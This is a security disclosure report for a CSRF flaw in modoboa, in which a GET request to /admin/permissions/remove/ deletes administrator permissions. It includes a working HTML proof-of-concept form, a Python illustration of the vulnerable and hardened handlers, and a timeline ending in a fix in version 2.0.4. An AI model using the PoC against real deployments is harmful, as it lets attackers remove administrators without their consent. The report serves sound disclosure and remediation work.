CSRF leading to removal of Administrator users in modoboa/modoboa


Reported on

Jan 21st 2023


The remove function is vulnerable to CSRF, which lets an attacker remove any Administrator user through a plain GET request: GET /admin/permissions/remove/?domid=2&daid=15

Proof of Concept

1/ Visit /admin/domains/1/

2/ The delete button that removes a permission is vulnerable to CSRF.

3/ Visit the PoC page below; changing the domid and daid values removes the corresponding administrator user.

```html
<!-- CSRF PoC - generated by Burp Suite Professional -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the browser issues a GET and attaches the victim's session cookie -->
    <form action="https://127.0.0.1/admin/permissions/remove/">
      <input type="hidden" name="domid" value="2" />
      <input type="hidden" name="daid" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```


cause the same by deleting the administrative username in




Allows an attacker to induce users to perform actions that they do not intend to perform
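The pattern behind this report, shown as an added, self-contained example (not modoboa's code): a state-changing endpoint that acts on a GET with query-string parameters can be triggered from any origin, because the browser attaches the victim's session cookie to the cross-site request. The hardened handler requires POST and checks a per-session CSRF token that a cross-origin page cannot read. The `Request` class, the `SESSIONS` table, the `csrfmiddlewaretoken` field name and the permission tuples are assumptions constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Set, Tuple

# (domain id, domain-admin id), mirroring the domid/daid parameters in the report.
Permission = Tuple[int, int]


@dataclass
class Request:
    """Minimal stand-in for an HTTP request (an assumption of this example)."""
    method: str
    path: str
    query: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)


# Constructed sample state: one logged-in superadmin session with a CSRF token
# bound to it, and a few domain-admin assignments. Not real modoboa data.
SESSIONS = {"sess-victim": {"user": "superadmin", "csrf": secrets.token_hex(16)}}


def fresh_permissions() -> Set[Permission]:
    return {(2, 15), (2, 16), (3, 15)}


def _session(req: Request):
    return SESSIONS.get(req.cookies.get("sessionid", ""))


def vulnerable_remove(req: Request, perms: Set[Permission]) -> int:
    """Before: a GET with query parameters performs the deletion. Only the
    session cookie is checked, and browsers send that cookie on cross-site
    navigations, so a hidden form on an attacker's page is enough."""
    if _session(req) is None:
        return 403
    perms.discard((int(req.query["domid"]), int(req.query["daid"])))
    return 200


def hardened_remove(req: Request, perms: Set[Permission]) -> int:
    """After: the state change requires POST, and the form must carry the
    per-session CSRF token, compared in constant time."""
    session = _session(req)
    if session is None:
        return 403
    if req.method != "POST":
        return 405
    token = req.form.get("csrfmiddlewaretoken", "")
    if not hmac.compare_digest(token, session["csrf"]):
        return 403
    perms.discard((int(req.form["domid"]), int(req.form["daid"])))
    return 200


def forged_get() -> Request:
    """What the PoC form sends from the victim's browser: attacker-chosen
    parameters plus the victim's cookie, which the browser adds on its own."""
    return Request("GET", "/admin/permissions/remove/",
                   query={"domid": "2", "daid": "15"},
                   cookies={"sessionid": "sess-victim"})


def forged_post() -> Request:
    """Same attack with method="post" on the form: still no valid token,
    because the attacker's origin cannot read the victim's page."""
    return Request("POST", "/admin/permissions/remove/",
                   form={"domid": "2", "daid": "15", "csrfmiddlewaretoken": "guess"},
                   cookies={"sessionid": "sess-victim"})


def legitimate_post() -> Request:
    """The real admin UI submits the token that was rendered into its page."""
    return Request("POST", "/admin/permissions/remove/",
                   form={"domid": "2", "daid": "15",
                         "csrfmiddlewaretoken": SESSIONS["sess-victim"]["csrf"]},
                   cookies={"sessionid": "sess-victim"})


def run(handler: Callable[[Request, Set[Permission]], int],
        req: Request) -> Tuple[int, bool]:
    """Run one request against fresh state; returns (status, whether the
    (2, 15) assignment survived)."""
    perms = fresh_permissions()
    status = handler(req, perms)
    return status, (2, 15) in perms


if __name__ == "__main__":
    print("vulnerable, forged GET :", run(vulnerable_remove, forged_get()))
    print("hardened,   forged GET :", run(hardened_remove, forged_get()))
    print("hardened,   forged POST:", run(hardened_remove, forged_post()))
    print("hardened,   real POST  :", run(hardened_remove, legitimate_post()))
```

The forged GET removes the assignment against the vulnerable handler and is rejected with 405 by the hardened one; switching the PoC form to `method="post"` still fails with 403 because the token is wrong, while the genuine admin form succeeds. A `SameSite` attribute on the session cookie is useful defense in depth but does not replace the token check.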


We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
0ozero0 modified the report
a year ago
0ozero0 modified the report
a year ago
We have contacted a member of the modoboa team and are waiting to hear back a year ago
modoboa/modoboa maintainer validated this vulnerability a year ago
0ozero0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
modoboa/modoboa maintainer
a year ago


Here is a fix: https://github.com/modoboa/modoboa/pull/2758

a year ago


Hi @maintainer, yes, looks fixed.

modoboa/modoboa maintainer marked this as fixed in 2.0.4 with commit 38d778 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
domain.py#L2 has been validated